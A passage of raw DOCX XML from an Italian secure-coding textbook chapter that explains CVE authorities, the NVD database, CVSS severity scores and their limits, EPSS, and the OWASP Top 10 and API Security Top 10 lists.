          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">CVE Numbering Authorities</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) a farlo per loro conto. Sono CNA, fra gli altri: Microsoft, Google, Apple, Red Hat, GitHub, le grandi aziende cloud, alcune università, alcuni CERT nazionali (per l’Italia: CERT-IT).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="196"/>
    <w:bookmarkStart w:id="197" w:name="dove-leggere-i-cve-nvd"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dove leggere i CVE: NVD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il database autorevole per consultare i CVE è il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">National Vulnerability Database</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(NVD): </w:t>
      </w:r>
      <w:hyperlink r:id="rId43">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://nvd.nist.gov</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per ogni CVE, NVD pubblica:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1086"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Descrizione tecnica</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">della vulnerabilità</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1086"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Software e versioni interessate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(in formato CPE —</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Common Platform Enumeration</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1086"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">CWE associato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(la categoria di debolezza)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1086"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Punteggio CVSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(vediamo subito cos’è)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1086"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Riferimenti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: link a advisory ufficiali, articoli, exploit pubblici</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quando un CVE compare nelle dipendenze del tuo progetto (</w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_9" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">capitolo 9</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> vedremo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip-audit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), la prima cosa da fare è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">andare a leggerne la scheda su NVD</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: capisci se ti riguarda davvero, qual è la severità, cosa fare.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="197"/>
    <w:bookmarkEnd w:id="198"/>
    <w:bookmarkStart w:id="202" w:name="Xdac184a64168c994e2853ab0dd27737f2e87deb"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="492" w:name="sec_4_7"/>
      <w:r>
        <w:t xml:space="preserve">4.7 CVSS: misurare la gravità di una vulnerabilità</w:t>
      </w:r>
      <w:bookmarkEnd w:id="492"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sapere che esiste un CVE non basta. Una vulnerabilità sfruttabile a distanza, senza autenticazione, con impatto totale, è infinitamente più grave di una sfruttabile solo localmente con accesso amministrativo. Per esprimere questa differenza in modo standardizzato esiste</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Common Vulnerability Scoring System</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="199" w:name="come-funziona"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Come funziona</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CVSS produce un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">punteggio da 0.0 a 10.0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che riassume la gravità della vulnerabilità. Il punteggio viene calcolato a partire da un insieme di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">metriche</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(vettore di attacco, complessità, privilegi richiesti, interazione utente, impatto su confidenzialità/integrità/disponibilità). Per i nostri scopi, basta sapere che il calcolo è oggettivo, riproducibile, e non dipende dal singolo valutatore.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">bande di gravità</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sono: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Punteggio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Severità</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Nessuna</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0.1 – 3.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Bassa</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">4.0 – 6.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Media</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">7.0 – 8.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Alta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">9.0 – 10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Critica</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">📚</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Esempi di CVSS reali.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- CVE-2021-44228 (Log4Shell) →</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS 10.0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(la massima possibile)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- CVE-2024-3094 (XZ Utils backdoor) →</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS 10.0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- CVE-2017-5638 (Apache Struts, Equifax) →</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS 10.0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- CVE-2014-0160 (Heartbleed) →</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS 7.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(allora)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Una tipica SQL Injection autenticata → da 6.5 a 8.0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Un XSS reflected → da 5.4 a 7.4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le vulnerabilità con CVSS ≥ 9.0 sono spesso etichettate come</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">requiring immediate action</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dalle policy aziendali: significa che la patch va applicata in poche ore, non in settimane.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="199"/>
    <w:bookmarkStart w:id="200" w:name="versioni-di-cvss"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Versioni di CVSS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CVSS è stato aggiornato più volte. Le versioni che incontrerai oggi:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1087"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS v3.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(2019) — la versione che ancora oggi appare nella maggior parte dei database e degli avvisi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1087"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS v4.0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(novembre 2023) — la versione più recente, con metriche aggiuntive per descrivere meglio l’ambiente reale e l’urgenza. L’adozione è in corso ma graduale: anche OWASP, nella Top 10:2025, ha dichiarato di non essere ancora riuscita a usare v4.0 per le proprie analisi. Per i tuoi scopi del primo anno, v3.1 e v4.0 sono molto simili: stessa scala 0-10, stesse bande di gravità.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="200"/>
    <w:bookmarkStart w:id="201" w:name="limiti-di-cvss"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Limiti di CVSS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CVSS è uno strumento utile ma non perfetto:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1088"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Misura la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">gravità tecnica intrinseca</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">della vulnerabilità, non il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">rischio per la tua specifica organizzazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Una vulnerabilità CVSS 10.0 in un componente che tu non usi, o usi in modo che non è sfruttabile, ha rischio reale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">zero</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per te.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1088"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Misura la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">possibilità</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">di sfruttamento, non la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">probabilità reale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Per quest’ultima esiste un altro punteggio chiamato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">EPSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit Prediction Scoring System</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), che stima la probabilità che la vulnerabilità venga effettivamente sfruttata nei prossimi 30 giorni. EPSS è complementare a CVSS, non alternativo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1088"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Non considera fattori organizzativi: criticità del business, esposizione, dati trattati. La valutazione completa del rischio resta umana.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="201"/>
    <w:bookmarkEnd w:id="202"/>
    <w:bookmarkStart w:id="203" w:name="owasp-api-security-top-10-cenno"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="493" w:name="sec_4_8"/>
      <w:r>
        <w:t xml:space="preserve">4.8 OWASP API Security Top 10 (cenno)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="493"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Un’ultima cosa importante. Esiste una</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Top 10 dedicata alle API REST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, separata dalla Top 10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tradizionale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, aggiornata l’ultima volta nel 2023. Si chiama</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP API Security Top 10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le sue voci ricalcano in parte la Top 10 generale, ma con accenti specifici per il mondo delle API:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1089"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">API1 — Broken Object Level Authorization (BOLA)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— IDOR sulle API</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1089"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">API2 — Broken Authentication</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— token mal gestiti, JWT vulnerabili</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1089"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">API3 — Broken Object Property Level Authorization</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— mass assignment, esposizione di campi sensibili</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1089"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">… e altre sette.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le abbiamo già anticipate alla fine del </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_3" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">-bis. Ricordatene se in futuro lavorerai principalmente con API: la lista API Security è il riferimento dedicato.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="203"/>
    <w:bookmarkStart w:id="204" w:name="riepilogo-del-capitolo-3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="494" w:name="sec_4_9"/>
      <w:r>
        <w:t xml:space="preserve">4.9 Riepilogo del capitolo</w:t>
      </w:r>
      <w:bookmarkEnd w:id="494"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1090"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è una fondazione no-profit internazionale che produce materiale gratuito sulla sicurezza del software. È lo standard di fatto del settore.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1090"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Top 10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è la classifica delle 10 categorie di vulnerabilità più critiche per le applicazioni web. Aggiornata ogni 3-4 anni, edizione attuale:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Top 10:2025</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1090"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le 10 voci della 2025: Broken Access Control, Security Misconfiguration, Software Supply Chain Failures, Cryptographic Failures, Injection, Insecure Design, Authentication Failures, Software or Data Integrity Failures, Security Logging &amp; Alerting Failures, Mishandling of Exceptional Conditions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1090"/>
